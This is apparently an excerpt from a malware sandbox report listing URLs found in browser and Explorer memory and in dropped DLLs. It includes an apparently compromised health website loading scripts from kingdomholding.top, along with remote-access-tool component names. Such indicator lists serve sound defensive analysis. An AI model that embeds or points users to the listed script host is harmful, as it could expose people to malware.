Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-dark
Source: chrome.exe, 00000000.00000003.1856103954.0000742401145000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2016699284.0000742400A07000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 00000000.00000003.1815893324.0000742402F4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clientservices.googleapis.com/uma/v2
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cookpolitical.com/2020-national-popular-vote-tracker
Source: chrome.exe, 00000000.00000003.2420118176.0000742402CD6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/cloudview-release
Source: chrome.exe, 00000000.00000003.2420118176.0000742402CD6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/cloudview-releasecross-origin-resource-policy:cross-origincross-origi
Source: pcicapi.dll.31.dr, PCICL32.DLL.31.dr, PCICHEK.DLL.31.dr, TCCTL32.DLL.31.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: pcicapi.dll.31.dr, PCICL32.DLL.31.dr, PCICHEK.DLL.31.dr, TCCTL32.DLL.31.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_win_third_p
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/release2/chrome_component/ac2ulwywnwgn2xush6ktfxep2vqq_3070/jflookgnkcckhobagl
Source: chrome.exe, 00000000.00000003.1694503576.0000742403D1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/release2/chrome_component/acahfy6bgvyjwyod7x6z6ar3cd4q_138.1/
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/release2/chrome_component/acahfy6bgvyjwyod7x6z6ar3cd4q_138.1/mfhmdacoffpmifoib
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultult
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultult0A
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: chrome.exe, 00000000.00000003.2419079385.0000742401112000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_defaultr7
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/ac2ulwywnwgn2xush6ktfxep2vqq_3070/jflook
Source: chrome.exe, 00000000.00000003.1694503576.0000742403D1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acahfy6bgvyjwyod7x6z6ar3cd4q_138.1/
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/ad6bqrogtrdeb2aualzvp3izob2a_3/hajigopbb
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/j2hxfei2occ5siitujtlwgp6xi_3/ojhpjlocmbo
Source: explorer.exe, 00000014.00000000.1337084127.0000000008313000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://financebuzz.com/top-signs-of-financial-fitness?utm_source=msn&utm_medium=feed&synd_slide=1&s
Source: chrome.exe, 00000000.00000003.3390319725.00007424004D2000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3269307697.0000742402162000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3350009991.000074240118D000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2543300071.00007424014C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca
Source: chrome.exe, 00000000.00000003.3390319725.00007424004D2000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3188767621.0000742400896000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2419319555.0000742401BA1000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3269307697.0000742402162000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2016795559.00007424030C2000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3350009991.000074240118D000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2217660889.0000742401B31000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2543300071.00007424014C7000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2421198380.000074240326F000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2420969918.00007424015CF000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2665480326.00007424003C4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1856136210.0000742401B77000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/.ca/
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/cdn-cgi/challenge-platform/h/g/scripts/jsd/6fab0cec561d/main.js?
Source: chrome.exe, 00000000.00000003.2420598347.0000742401C63000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/cdn-cgi/rum?
Source: chrome.exe, 00000000.00000003.2419079385.0000742401112000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/themes/base/button.css?swwsy8
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/themes/base/theme.css?swwsy8
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/data-min.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2665480326.00007424003C4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/focusable-min.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.1694222507.0000742401CEC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/ie-min.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/labels-min.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/plugin-min.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/unique-id-min.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2665480326.00007424003C4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/version-min.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2420969918.00007424015CF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/widgets/button-min.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/loadjs/loadjs.min.js?v=4.2.0
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/tabbable/index.umd.min.js?v=6.1.2
Source: chrome.exe, 00000000.00000003.2543300071.00007424014C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/tabbable/index.umd.min.js?v=6.1.2E027DA2CDEC333310
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/underscore/underscore-min.js?v=1.13.6
Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/misc/dialog/dialog.ajax.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.3228919167.0000742400407000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/misc/dialog/dialog.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/misc/dialog/dialog.position.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2217660889.0000742401B31000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/misc/drupal.init.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/misc/jquery.tabbable.shim.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.3350009991.000074240118D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/misc/progress.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/modules/ckeditor5/css/ckeditor5.dialog.fix.css?swwsy8
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/modules/ckeditor5/js/ckeditor5.dialog.fix.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2421198380.000074240326F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/modules/layout_discovery/layouts/onecol/onecol.css?swwsy8
Source: chrome.exe, 00000000.00000003.2421198380.000074240326F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/modules/system/css/components/fieldgroup.module.css?swwsy8
Source: chrome.exe, 00000000.00000003.2421198380.000074240326F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/modules/system/css/components/fieldgroup.module.css?swwsy8$t
Source: chrome.exe, 00000000.00000003.2419079385.0000742401112000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/modules/views/css/views-responsive-grid.css?swwsy8
Source: chrome.exe, 00000000.00000003.1653712601.0000742400525000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1856136210.0000742401B77000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/en
Source: chrome.exe, 00000000.00000003.3390319725.00007424004D2000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3350009991.000074240118D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/en#
Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/en(
Source: chrome.exe, 00000000.00000003.2746010123.0000742401B16000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/en/search/node
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/libraries/jquery.cycle/jquery.cycle.all.js?v=3.0.3
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/modules/ajax_loader/js/ajax-throbber.js?v=1.x
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2420969918.00007424015CF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/modules/google_analytics/js/google_analytics.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/modules/views_slideshow/js/views_slideshow.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2016795559.00007424030C2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/modules/views_slideshow/modules/views_slideshow_cycle/js/views_slideshow
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/modules/webform/js/webform.behaviors.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/modules/webform/js/webform.states.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/modules/webform/modules/webform_bootstrap/js/webform_bootstrap.states.js
Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2419319555.0000742401BA1000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2419079385.0000742401112000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/FOH%20-%20Favicon.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/FOH%20-%20Favicon.pngme
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/Message-Blue.png
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/Message-Blue.pngler
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/button-thoughts-e_1.png
Source: chrome.exe, 00000000.00000003.2705710332.0000742401585000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/button-thoughts-h_1.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/button-thoughts-i_1.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/button-thoughts-v_1.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/facebook-t.svg
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/facebook.svg
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/foh-logo%203.svg
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-1-300_6.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-E-300_6.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-E-300_6.png1.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-H-300_6.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-R-300_6.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-T-300_7.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-V-300_6.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icons8-download-40.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icons8-up-64.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/leaves-banner-2_0_0.jpg
Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3269307697.0000742402162000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/redirect%20icone%20.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/twitter-t.svg
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/wellness-app.gif
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/youtube-t.svg
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/youtube.svg
Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/dialog.js?swwsy8trap/js/misc/states.js?swwsy8
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/drupal.bootstrap.js?swwsy8
Source: chrome.exe, 00000000.00000003.3228919167.0000742400407000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/misc/ajax.js?swwsy8
Source: chrome.exe, 00000000.00000003.3390319725.00007424004D2000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/misc/dialog.ajax.js?swwsy8
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/misc/dialog.ajax.js?swwsy8t
Source: chrome.exe, 00000000.00000003.3390319725.00007424004D2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/misc/message.js?swwsy8
Source: chrome.exe, 00000000.00000003.2543300071.00007424014C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/misc/progress.js?swwsy8
Source: chrome.exe, 00000000.00000003.2543300071.00007424014C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/misc/progress.js?swwsy810.1.0
Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/modal.jquery.ui.bridge.js?swwsy8
Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/modal.jquery.ui.bridge.js?swwsy8H
Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/modal.jquery.ui.bridge.js?swwsy8J
Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/popover.js?swwsy8
Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/tooltip.js?swwsy8
Source: chrome.exe, 00000000.00000003.2419079385.0000742401112000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/images/Testimonials/Aging_featured-2.jpg
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/js/banner-slider.js?swwsy8
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/js/thrivequestion.js?swwsy8
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/js/thrivequestion.js?swwsy8ript
Source: chrome.exe, 00000000.00000003.2257873337.000074240335C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://i.ytimg.com/vi/FURi5aHgp1g/maxresdefault.jpg?sqp=-oaymwEmCIAKENAF8quKqQMa8AEB-AH-CYAC0AWKAgw
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA10WNpO.img
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bAqmF.img
Source: explorer.exe, 00000014.00000003.1585593064.0000000006C95000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1919124163.0000000006C95000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2018621481.0000000006C95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hIktm.img
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hMa61.img
Source: explorer.exe, 00000014.00000003.1585593064.0000000006C95000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1919124163.0000000006C95000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2018621481.0000000006C95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42cl9.img
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1e6XdQ.img
Source: chrome.exe, 00000000.00000003.2419319555.0000742401BA1000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1856136210.0000742401B77000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://kingdomholding.top/ss/fon.js
Source: chrome.exe, 00000000.00000003.2137421272.00007424027EB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://kingdomholding.top/ss/index.js?5e7da6cb85fe8b1284
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/chat/download?usp=chrome_default
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_defaultdefault
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://news.gallup.com/poll/247016/conservatives-greatly-outnumber-liberals-states.aspx
Source: explorer.exe, 00000014.00000000.1326758086.0000000002A82000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2024391755.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1588575943.0000000002A99000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: chrome.exe, 00000000.00000003.3269307697.0000742402173000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2419319555.0000742401BA1000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2419079385.0000742401112000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://play.google.com/log?hasfast=true&authuser=0&format=json
Source: chrome.exe, 00000000.00000003.2419079385.0000742401112000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://play.google.com/log?hasfast=true&authuser=0&format=jsonator
Source: chrome.exe, 00000000.00000003.2419319555.0000742401BA1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://play.google.com/log?hasfast=true&authuser=0&format=jsonr
